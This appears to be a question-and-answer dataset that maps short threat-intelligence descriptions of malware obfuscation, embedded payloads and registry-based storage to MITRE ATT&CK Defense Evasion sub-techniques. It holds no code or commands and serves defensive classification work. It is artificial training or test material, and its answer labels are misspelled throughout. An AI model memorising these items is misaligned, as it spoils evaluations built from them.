+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Samurai can encrypt API name strings with an XOR-based algorithm.,"Tecnique: T1027.007 Obfuscated Files or Information: Dynamic API Resolution, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: macOS.OSAMiner has used run-only Applescripts, a compiled and stripped version of AppleScript, to remove human readable indicators to evade detection.","Tecnique: T1027.008 Obfuscated Files or Information: Stripped Payloads, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: For C0021, the threat actors embedded a base64-encoded payload within a LNK file.","Tecnique: T1027.009 Obfuscated Files or Information: Embedded Payloads, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BADHATCH has an embedded second stage DLL payload within the first stage of the malware.,"Tecnique: T1027.009 Obfuscated Files or Information: Embedded Payloads, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ComRAT has embedded a XOR encrypted communications module inside the orchestrator module.,"Tecnique: T1027.009 Obfuscated Files or Information: Embedded Payloads, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: The DEADEYE.EMBED variant of DEADEYE has the ability to embed payloads inside of a compiled binary.,"Tecnique: T1027.009 Obfuscated Files or Information: Embedded Payloads, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Dtrack has used a dropper that embeds an encrypted payload as extra data.,"Tecnique: T1027.009 Obfuscated Files or Information: Embedded Payloads, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Emotet has dropped an embedded executable at `%Temp%\setup.exe`.,"Tecnique: T1027.009 Obfuscated Files or Information: Embedded Payloads, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Invoke-PSImage can be used to embed payload data within a new image file.,"Tecnique: T1027.009 Obfuscated Files or Information: Embedded Payloads, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Netwalker's DLL has been embedded within the PowerShell script in hex format.,"Tecnique: T1027.009 Obfuscated Files or Information: Embedded Payloads, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: The SMOKEDHAM source code is embedded in the dropper as an encrypted string.,"Tecnique: T1027.009 Obfuscated Files or Information: Embedded Payloads, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: The Uroburos Queue file contains embedded executable files along with key material, communication channels, and modes of operation.","Tecnique: T1027.009 Obfuscated Files or Information: Embedded Payloads, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: macOS.OSAMiner has embedded Stripped Payloads within another run-only Stripped Payloads.,"Tecnique: T1027.009 Obfuscated Files or Information: Embedded Payloads, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During C0018, the threat actors used Base64 to encode their PowerShell scripts.","Tecnique: T1027.010 Obfuscated Files or Information: Command Obfuscation, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During C0021, the threat actors used encoded PowerShell commands.","Tecnique: T1027.010 Obfuscated Files or Information: Command Obfuscation, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Frankenstein, the threat actors ran encoded commands from the command line.","Tecnique: T1027.010 Obfuscated Files or Information: Command Obfuscation, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation CuckooBees, the threat actors executed an encoded VBScript file.","Tecnique: T1027.010 Obfuscated Files or Information: Command Obfuscation, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation Wocao, threat actors executed PowerShell commands which were encoded or compressed using Base64, zlib, and XOR.","Tecnique: T1027.010 Obfuscated Files or Information: Command Obfuscation, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT19 used Base64 to obfuscate executed commands.,"Tecnique: T1027.010 Obfuscated Files or Information: Command Obfuscation, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT32 has used the `Invoke-Obfuscation` framework to obfuscate their PowerShell.,"Tecnique: T1027.010 Obfuscated Files or Information: Command Obfuscation, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Aquatic Panda has encoded PowerShell commands in Base64.,"Tecnique: T1027.010 Obfuscated Files or Information: Command Obfuscation, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Chimera has encoded PowerShell commands.,"Tecnique: T1027.010 Obfuscated Files or Information: Command Obfuscation, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cobalt Group obfuscated several scriptlets and code used on the victim’s machine, including through use of XOR and RC4.","Tecnique: T1027.010 Obfuscated Files or Information: Command Obfuscation, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ember Bear has obfuscated malicious scripts to help avoid detection.,"Tecnique: T1027.010 Obfuscated Files or Information: Command Obfuscation, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN6 has used encoded PowerShell commands.,"Tecnique: T1027.010 Obfuscated Files or Information: Command Obfuscation, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN7 has used fragmented strings, environment variables, standard input (stdin), and native character-replacement functionalities to obfuscate commands.","Tecnique: T1027.010 Obfuscated Files or Information: Command Obfuscation, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN8 has used environment variables and standard input (stdin) to obfuscate command-line arguments. FIN8 also obfuscates malicious macros delivered as payloads.,"Tecnique: T1027.010 Obfuscated Files or Information: Command Obfuscation, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Fox Kitten has base64 encoded scripts to avoid detection.,"Tecnique: T1027.010 Obfuscated Files or Information: Command Obfuscation, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: GOLD SOUTHFIELD has executed base64 encoded PowerShell scripts on compromised hosts.,"Tecnique: T1027.010 Obfuscated Files or Information: Command Obfuscation, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Gamaredon Group has used obfuscated or encrypted scripts.,"Tecnique: T1027.010 Obfuscated Files or Information: Command Obfuscation, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HEXANE has used Base64-encoded scripts.,"Tecnique: T1027.010 Obfuscated Files or Information: Command Obfuscation, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LazyScripter has leveraged the BatchEncryption tool to perform advanced batch script obfuscation and encoding techniques.,"Tecnique: T1027.010 Obfuscated Files or Information: Command Obfuscation, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Leafminer obfuscated scripts that were used on victim machines.,"Tecnique: T1027.010 Obfuscated Files or Information: Command Obfuscation, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Magic Hound has used base64-encoded commands.,"Tecnique: T1027.010 Obfuscated Files or Information: Command Obfuscation, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MuddyWater has used Daniel Bohannon’s Invoke-Obfuscation framework and obfuscated PowerShell scripts. The group has also used other obfuscation methods, including Base64 obfuscation of VBScripts and PowerShell commands.","Tecnique: T1027.010 Obfuscated Files or Information: Command Obfuscation, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Patchwork has obfuscated a script with Crypto Obfuscator.,"Tecnique: T1027.010 Obfuscated Files or Information: Command Obfuscation, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sandworm Team has used ROT13 encoding, AES encryption and compression with the zlib library for their Python-based backdoor.","Tecnique: T1027.010 Obfuscated Files or Information: Command Obfuscation, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sidewinder has used base64 encoding for scripts.,"Tecnique: T1027.010 Obfuscated Files or Information: Command Obfuscation, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Silence has used environment variable string substitution for obfuscation.,"Tecnique: T1027.010 Obfuscated Files or Information: Command Obfuscation, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TA505 has used base64 encoded PowerShell commands.,"Tecnique: T1027.010 Obfuscated Files or Information: Command Obfuscation, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TA551 has used obfuscated variable names in a JavaScript configuration file.,"Tecnique: T1027.010 Obfuscated Files or Information: Command Obfuscation, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Turla has used encryption (including salted 3DES via PowerSploit's Out-EncryptedScript.ps1), random variable names, and base64 encoding to obfuscate PowerShell commands and payloads.","Tecnique: T1027.010 Obfuscated Files or Information: Command Obfuscation, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Wizard Spider used Base64 encoding to obfuscate an Empire service and PowerShell commands.,"Tecnique: T1027.010 Obfuscated Files or Information: Command Obfuscation, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Astaroth has obfuscated and randomized parts of the JScript code it is initiating.,"Tecnique: T1027.010 Obfuscated Files or Information: Command Obfuscation, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BADHATCH malicious PowerShell commands can be encoded with base64.,"Tecnique: T1027.010 Obfuscated Files or Information: Command Obfuscation, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BackConfig has used compressed and decimal encoded VBS scripts.,"Tecnique: T1027.010 Obfuscated Files or Information: Command Obfuscation, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CARROTBAT has the ability to execute obfuscated commands on the infected host.,"Tecnique: T1027.010 Obfuscated Files or Information: Command Obfuscation, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ComRAT has used encryption and base64 to obfuscate its orchestrator code in the Registry. ComRAT has also used encoded PowerShell scripts.,"Tecnique: T1027.010 Obfuscated Files or Information: Command Obfuscation, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CookieMiner has used base64 encoding to obfuscate scripts on the system.,"Tecnique: T1027.010 Obfuscated Files or Information: Command Obfuscation, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DarkWatchman has used Base64 to encode PowerShell commands.,"Tecnique: T1027.010 Obfuscated Files or Information: Command Obfuscation, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Denis has encoded its PowerShell commands in Base64.,"Tecnique: T1027.010 Obfuscated Files or Information: Command Obfuscation, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Emotet has obfuscated macros within malicious documents to hide the URLs hosting the malware, CMD.exe arguments, and PowerShell scripts.","Tecnique: T1027.010 Obfuscated Files or Information: Command Obfuscation, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Empire has the ability to obfuscate commands using Invoke-Obfuscation.,"Tecnique: T1027.010 Obfuscated Files or Information: Command Obfuscation, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FruitFly executes and stores obfuscated Perl scripts.,"Tecnique: T1027.010 Obfuscated Files or Information: Command Obfuscation, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: IceApple can use Base64 and ""junk"" JavaScript code to obfuscate information.","Tecnique: T1027.010 Obfuscated Files or Information: Command Obfuscation, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: KOCTOPUS has obfuscated scripts with the BatchEncryption tool.,"Tecnique: T1027.010 Obfuscated Files or Information: Command Obfuscation, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LoudMiner has obfuscated various scripts.,"Tecnique: T1027.010 Obfuscated Files or Information: Command Obfuscation, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Machete has used pyobfuscate, zlib compression, and base64 encoding for obfuscation. Machete has also used some visual obfuscation techniques by naming variables as combinations of letters to hinder analysis.","Tecnique: T1027.010 Obfuscated Files or Information: Command Obfuscation, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Netwalker's PowerShell script has been obfuscated with multiple layers including base64 and hexadecimal encoding and XOR-encryption, as well as obfuscated PowerShell functions and variables.","Tecnique: T1027.010 Obfuscated Files or Information: Command Obfuscation, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: POWERSTATS uses character replacement, PowerShell environment variables, and XOR encoding to obfuscate code. POWERSTATS's backdoor code is a multi-layer obfuscated, encoded, and compressed blob. POWERSTATS has used PowerShell code with custom string obfuscation","Tecnique: T1027.010 Obfuscated Files or Information: Command Obfuscation, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PoetRAT has `pyminifier` to obfuscate scripts.,"Tecnique: T1027.010 Obfuscated Files or Information: Command Obfuscation, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PowerPunch can use Base64-encoded scripts.,"Tecnique: T1027.010 Obfuscated Files or Information: Command Obfuscation, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PowerSploit contains a collection of ScriptModification modules that compress and encode scripts and payloads.,"Tecnique: T1027.010 Obfuscated Files or Information: Command Obfuscation, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: QUADAGENT was likely obfuscated using `Invoke-Obfuscation`.,"Tecnique: T1027.010 Obfuscated Files or Information: Command Obfuscation, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: QakBot can use obfuscated and encoded scripts.,"Tecnique: T1027.010 Obfuscated Files or Information: Command Obfuscation, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: The PowerShell script with the RogueRobin payload was obfuscated using the COMPRESS technique in `Invoke-Obfuscation`.,"Tecnique: T1027.010 Obfuscated Files or Information: Command Obfuscation, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SHARPSTATS has used base64 encoding and XOR to obfuscate PowerShell scripts.,"Tecnique: T1027.010 Obfuscated Files or Information: Command Obfuscation, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SQLRat has used a character insertion obfuscation technique, making the script appear to contain Chinese characters.","Tecnique: T1027.010 Obfuscated Files or Information: Command Obfuscation, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sardonic PowerShell scripts can be encrypted with RC4 and compressed using Gzip.,"Tecnique: T1027.010 Obfuscated Files or Information: Command Obfuscation, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sibot has obfuscated scripts used in execution.,"Tecnique: T1027.010 Obfuscated Files or Information: Command Obfuscation, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ursnif droppers execute base64 encoded PowerShell commands.,"Tecnique: T1027.010 Obfuscated Files or Information: Command Obfuscation, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Zeus Panda obfuscates the macro commands in its initial payload.,"Tecnique: T1027.010 Obfuscated Files or Information: Command Obfuscation, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation CuckooBees, the threat actors stroed payloads in Windows CLFS (Common Log File System) transactional logs.","Tecnique: T1027.011 Obfuscated Files or Information: Fileless Storage, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT32's backdoor has stored its configuration in a registry key.,"Tecnique: T1027.011 Obfuscated Files or Information: Fileless Storage, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Turla has used the Registry to store encrypted and encoded payloads.,"Tecnique: T1027.011 Obfuscated Files or Information: Fileless Storage, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CHOPSTICK may store RC4 encrypted configuration information in the Windows Registry.,"Tecnique: T1027.011 Obfuscated Files or Information: Fileless Storage, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Some versions of Chaes stored its instructions (otherwise in a `instructions.ini` file) in the Registry.,"Tecnique: T1027.011 Obfuscated Files or Information: Fileless Storage, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ComRAT has stored encrypted orchestrator code and payloads in the Registry.,"Tecnique: T1027.011 Obfuscated Files or Information: Fileless Storage, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DarkWatchman can store configuration strings, keylogger, and output of components in the Registry.","Tecnique: T1027.011 Obfuscated Files or Information: Fileless Storage, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Exaramel for Windows stores the backdoor's configuration in the Registry in XML format.,"Tecnique: T1027.011 Obfuscated Files or Information: Fileless Storage, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Gelsemium can store its components in the Registry.,"Tecnique: T1027.011 Obfuscated Files or Information: Fileless Storage, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Grandoreiro can store its configuration in the Registry at `HKCU\Software\` under frequently changing names including %USERNAME% and ToolTech-RM.,"Tecnique: T1027.011 Obfuscated Files or Information: Fileless Storage, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mosquito stores configuration values under the Registry key HKCU\Software\Microsoft\[dllname].,"Tecnique: T1027.011 Obfuscated Files or Information: Fileless Storage, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: NETWIRE can store its configuration information in the Registry under `HKCU:\Software\Netwire`.,"Tecnique: T1027.011 Obfuscated Files or Information: Fileless Storage, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Pillowmint has stored a compressed payload in the Registry key HKLM\SOFTWARE\Microsoft\DRM.,"Tecnique: T1027.011 Obfuscated Files or Information: Fileless Storage, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PipeMon has stored its encrypted payload in the Registry under `HKLM\SOFTWARE\Microsoft\Print\Components\`.,"Tecnique: T1027.011 Obfuscated Files or Information: Fileless Storage, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PolyglotDuke can store encrypted JSON configuration files in the Registry.,"Tecnique: T1027.011 Obfuscated Files or Information: Fileless Storage, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: QUADAGENT stores a session identifier unique to the compromised system as well as a pre-shared key used for encrypting and decrypting C2 communications within a Registry key (such as `HKCU\Office365DCOMCheck`) in the `HKCU` hive.,"Tecnique: T1027.011 Obfuscated Files or Information: Fileless Storage, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: QakBot can store its configuration information in a randomly named subkey under HKCU\Software\Microsoft.,"Tecnique: T1027.011 Obfuscated Files or Information: Fileless Storage, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RCSession can store its obfuscated configuration file in the Registry under `HKLM\SOFTWARE\Plus` or `HKCU\SOFTWARE\Plus`.,"Tecnique: T1027.011 Obfuscated Files or Information: Fileless Storage, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: REvil can save encryption parameters and system information in the Registry.,"Tecnique: T1027.011 Obfuscated Files or Information: Fileless Storage, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RegDuke can store its encryption key in the Registry.,"Tecnique: T1027.011 Obfuscated Files or Information: Fileless Storage, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ShadowPad maintains a configuration block and virtual file system in the Registry.,"Tecnique: T1027.011 Obfuscated Files or Information: Fileless Storage, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sibot has installed a second-stage script in the HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\sibot registry key.,"Tecnique: T1027.011 Obfuscated Files or Information: Fileless Storage, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SysUpdate can store its encoded configuration file within Software\Classes\scConfig in either HKEY_LOCAL_MACHINE or HKEY_CURRENT_USER.,"Tecnique: T1027.011 Obfuscated Files or Information: Fileless Storage, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TYPEFRAME can install and store encrypted configuration data under the Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellCompatibility\Applications\laxhost.dll and HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\PrintConfigs.,"Tecnique: T1027.011 Obfuscated Files or Information: Fileless Storage, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ThreatNeedle can save its configuration data as a RC4-encrypted Registry key under `HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\GameCon`.,"Tecnique: T1027.011 Obfuscated Files or Information: Fileless Storage, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TinyTurla can save its configuration parameters in the Registry.,"Tecnique: T1027.011 Obfuscated Files or Information: Fileless Storage, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Uroburos can store configuration information for the kernel driver and kernel driver loader components in an encrypted blob typically found at `HKLM:\SOFTWARE\Classes\.wav\OpenWithProgIds.`,"Tecnique: T1027.011 Obfuscated Files or Information: Fileless Storage, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Valak has the ability to store information regarding the C2 server and downloads in the Registry key HKCU\Software\ApplicationContainer\Appsw64.,"Tecnique: T1027.011 Obfuscated Files or Information: Fileless Storage, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Volgmer stores an encoded configuration file in HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Security.,"Tecnique: T1027.011 Obfuscated Files or Information: Fileless Storage, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Cutting Edge, threat actors used a Base64-encoded Python script to write a patched version of the Ivanti Connect Secure `dsls` binary.","Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Night Dragon, threat actors used a DLL that included an XOR-encoded section.","Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation Dream Job, Lazarus Group encrypted malware such as DRATzarus with XOR and DLL files with base64.","Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation Dust Storm, the threat actors encoded some payloads with a single-byte XOR, both skipping the key itself and zeroing in an attempt to avoid exposing the key; other payloads were Base64-encoded.","Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation Honeybee, the threat actors used Base64 to encode files with a custom key.","Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: For Operation Spalax, the threat actors used XOR-encrypted payloads.","Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT18 obfuscates strings in the payload.,"Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT19 used Base64 to obfuscate payloads.,"Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT28 encrypted a .dll payload using RTL and a custom encryption algorithm. APT28 has also obfuscated payloads with base64, XOR, and RC4.","Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT32 has performed code obfuscation, including encoding payloads using Base64 and using a framework called ""Dont-Kill-My-Cat (DKMC). APT32 also encrypts the library used for network exfiltration with AES-256 in CBC mode in their macOS backdoor.","Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT33 has used base64 to encode payloads.,"Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT39 has used malware to drop encrypted CAB files.,"Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BITTER has used a RAR SFX dropper to deliver malware.,"Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Blue Mockingbird has obfuscated the wallet address in the payload binary.,"Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Dark Caracal has obfuscated strings in Bandook by base64 encoding, and then encrypting them.","Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Darkhotel has obfuscated code using RC4, XOR, and RSA.","Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Elderwood has encrypted documents and malicious executables.,"Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Fox Kitten has base64 encoded payloads to avoid detection.,"Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Group5 disguised its malicious binaries with several layers of obfuscation, including encrypting the files.","Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Higaisa used Base64 encoded compressed payloads.,"Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Inception has encrypted malware payloads dropped on victim machines with AES and RC4 encryption.,"Tecnique: T1027.013 Obfuscated Files or Information: Encrypted/Encoded File, Tactic: TA0005 Defense Evasion"
